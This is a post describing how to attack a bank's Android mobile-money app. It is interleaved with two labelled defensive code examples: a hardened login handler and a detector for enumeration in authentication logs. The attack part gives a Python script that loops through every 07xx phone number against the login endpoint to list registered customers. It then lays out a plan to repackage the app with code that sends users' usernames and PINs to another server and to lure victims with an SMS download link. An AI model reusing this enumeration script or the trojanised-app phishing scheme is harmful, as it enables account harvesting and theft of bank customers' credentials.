Exploiting Mco-op Cash Android App

Disclaimer.
1. I am not a hacker.
2. I have not actually tested my idea.
3. I have reported this to Co-op Bank.
4. This is not a tutorial. (I will skip a lot of stuff).

Vulnerabilities

1. Mco-op Cash is a hybrid application, meaning it is built with HTML, CSS and JS and then packaged as a mobile app. While building a hybrid app is faster and easier than building a native application, it also makes the app easy to reverse engineer.

2. The app uses phone numbers as usernames.

3. The API responses are not encrypted, so it's quite easy to figure out what is happening in the background.

Reverse engineering

Reverse engineering an Android application is more straightforward than it sounds.

Step 1. Get the .apk file

Just copy the Play Store URL, in our case https://play.google.com/store/apps/details?id=com.coopbank.cooperative

Go to http://apps.evozi.com/apk-downloader/, paste it and generate a download link.

Easy, right?

Step 2. Get a decompiler

Step 3. Decompile.

Done.

The Code

The first thing I looked for was the API endpoints, i.e. the URLs the app sends requests to for things like login and registration.
I then tested the login endpoint with these parameters and got these responses:

1. Correct username and password (mine)

{"success":true,"custometno":"152xxxx","message":"Login successful","logintime":1425366269,"partialregistration":false}

2. Correct username and wrong password.

{"success":false,"message":"Invalid Details, Attempt: 1"}

3. Random username and password.

{"success":false,"message":"Kindly register using the self registration menu"}

4. Co-op Bank member, expired PIN.

{"success":false,"firstlogin":true,"message":"PIN has expired, Kindly view Terms and Condition and request PIN reset.","termsandconditionslink":"http:\/\/www.co-opbank.co.ke"}

Using this info

Based on these HTTP responses, you can easily tell which phone numbers have signed up for Mco-op Cash: the error message for an unknown number differs from the one for a registered number with a wrong PIN.
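To make the defect concrete from the server side, here is an added example (not code from the post or from Co-op Bank) that models a login handler returning the four distinct response shapes listed above, beside a hardened handler that returns one generic failure body for unknown numbers, wrong PINs and locked accounts alike, and only reveals "PIN expired" after the correct PIN has been presented. The user store, phone numbers, PINs and message text are constructed for the example; a probe function shows that the first handler lets a caller distinguish registered from unregistered numbers and the second does not.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


def _hash_pin(pin: str, salt: bytes) -> bytes:
    # PBKDF2 so the stored value is not the PIN itself (assumed; the post says nothing about storage).
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 100_000)


@dataclass
class Account:
    salt: bytes
    pin_hash: bytes
    expired: bool = False
    failed_attempts: int = 0


def _make_account(pin: str, expired: bool = False) -> Account:
    salt = os.urandom(16)
    return Account(salt, _hash_pin(pin, salt), expired)


# Constructed sample accounts: phone number -> Account. Not real customers.
USERS = {
    "0700000001": _make_account("1234"),
    "0700000002": _make_account("5678", expired=True),
}

MAX_FAILED_ATTEMPTS = 5


def vulnerable_login(username: str, password: str) -> dict:
    """Each branch answers differently, mirroring the response shapes in the post."""
    acct = USERS.get(username)
    if acct is None:
        return {"success": False, "message": "Kindly register using the self registration menu"}
    if acct.expired:
        return {"success": False, "firstlogin": True,
                "message": "PIN has expired, Kindly view Terms and Condition and request PIN reset."}
    if hmac.compare_digest(_hash_pin(password, acct.salt), acct.pin_hash):
        acct.failed_attempts = 0
        return {"success": True, "message": "Login successful"}
    acct.failed_attempts += 1
    # The attempt counter is a second leak: it only appears for registered numbers.
    return {"success": False, "message": f"Invalid Details, Attempt: {acct.failed_attempts}"}


GENERIC_FAILURE = {"success": False, "message": "Invalid phone number or PIN"}


def hardened_login(username: str, password: str) -> dict:
    """Unknown number, wrong PIN and locked account all produce the same body."""
    acct = USERS.get(username)
    if acct is None:
        # Do the same amount of work for unknown users so timing does not give them away.
        _hash_pin(password, b"\x00" * 16)
        return dict(GENERIC_FAILURE)
    if acct.failed_attempts >= MAX_FAILED_ATTEMPTS:
        # Lockout is tracked server-side; the user is told out of band, not in this response.
        return dict(GENERIC_FAILURE)
    if not hmac.compare_digest(_hash_pin(password, acct.salt), acct.pin_hash):
        acct.failed_attempts += 1
        return dict(GENERIC_FAILURE)
    acct.failed_attempts = 0
    if acct.expired:
        # Expiry is disclosed only to someone who has just proven they know the PIN.
        return {"success": False, "firstlogin": True, "message": "PIN has expired, request a PIN reset."}
    return {"success": True, "message": "Login successful"}


def leaks_account_existence(login_fn) -> bool:
    """Probe a registered, an expired and an unregistered number with a wrong PIN.

    Returns True when the bodies differ, i.e. the handler lets a caller enumerate accounts.
    """
    registered = login_fn("0700000001", "0000")
    expired = login_fn("0700000002", "0000")
    unknown = login_fn("0799999999", "0000")
    return not (registered == expired == unknown)


if __name__ == "__main__":
    print("vulnerable handler leaks:", leaks_account_existence(vulnerable_login))
    print("hardened handler leaks:  ", leaks_account_existence(hardened_login))
```

The generic message alone is not enough in practice: the hardened handler also keeps the attempt counter out of the response, hashes a dummy value for unknown numbers so the two paths take similar time, and defers the expiry notice until after a successful PIN check. Per-source rate limiting, which this example omits, is what stops a slow scan across the whole number range.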

You can then write a script that loops through the phone numbers 0700000000 to 0799999999 and saves the ones the endpoint reports as existing Mco-op Cash users, e.g.

import requests
import json

found = []  # phone numbers the login endpoint reported as registered
for x in range(700000000, 800000000):  # 0700000000 to 0799999999
    number = '0%09d' % x  # keep the leading zero; a literal 0700000000 is not valid Python
    post_data = {'username': number, 'password': '0000'}
    # placeholder URL from the post, not the real endpoint
    post_response = requests.post(url='https://coopbank-api-path.com/login.php', data=post_data)
    js = json.loads(post_response.text)
    if js['message'].startswith('Invalid Details'):  # differs from the "Kindly register" reply
        found.append(number)  # code to save phone number to database

Now we have a list of phone numbers of Mco-op Cash users.
You can then add a script to the application that sends the username and password info to another server.

Finally, repackage the app and send an SMS to users with a download link to the "fake" app.
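A scan like the one above is noisy on the server side: one source tries a long run of different usernames in a short time, almost all of them failing. The following added example (not code from the post or from the bank) shows the detection a defender would run over authentication logs. The log format, source addresses and phone numbers are constructed for the example; it flags any source that presents more than a threshold of distinct usernames with failed logins inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log line format (constructed for this example):
#   2015-03-03T08:44:29Z src=<ip> user=<phone number> result=<fail|success>
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\d+) result=(?P<result>\w+)$")


def parse_line(line: str):
    """Return a dict for a well-formed line, or None for anything the regex does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": m["src"],
        "user": m["user"],
        "result": m["result"],
    }


def find_enumeration_sources(lines, window=timedelta(minutes=5), max_distinct_users=10):
    """Map each suspicious source to the largest number of distinct usernames it tried
    (with a non-success result) within any window of the given length."""
    failures_by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is not None and ev["result"] != "success":
            failures_by_src[ev["src"]].append((ev["ts"], ev["user"]))

    flagged = {}
    for src, events in failures_by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until every event in [start, end] fits in the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({user for _, user in events[start:end + 1]})
            if distinct > max_distinct_users:
                flagged[src] = max(distinct, flagged.get(src, 0))
    return flagged


# Constructed sample log: one legitimate user who mistypes once, and one source
# walking through 25 consecutive phone numbers in under half a minute.
SAMPLE_LOG = [
    "2015-03-03T08:44:29Z src=203.0.113.9 user=0700000001 result=fail",
    "2015-03-03T08:44:31Z src=203.0.113.9 user=0700000001 result=success",
    "this line is not in the expected format and is ignored",
] + [
    f"2015-03-03T08:45:{i:02d}Z src=198.51.100.7 user=07000{i:05d} result=fail"
    for i in range(25)
]


if __name__ == "__main__":
    for src, count in find_enumeration_sources(SAMPLE_LOG).items():
        print(f"possible account enumeration from {src}: {count} distinct usernames")
```

Counting distinct usernames rather than raw failures is what separates a scan from an ordinary customer who forgets their PIN, and it still fires once the response bodies have been made uniform, because the scanning pattern is visible in the request stream regardless of what the server answers. Thresholds and window length are parameters to tune against the service's real traffic.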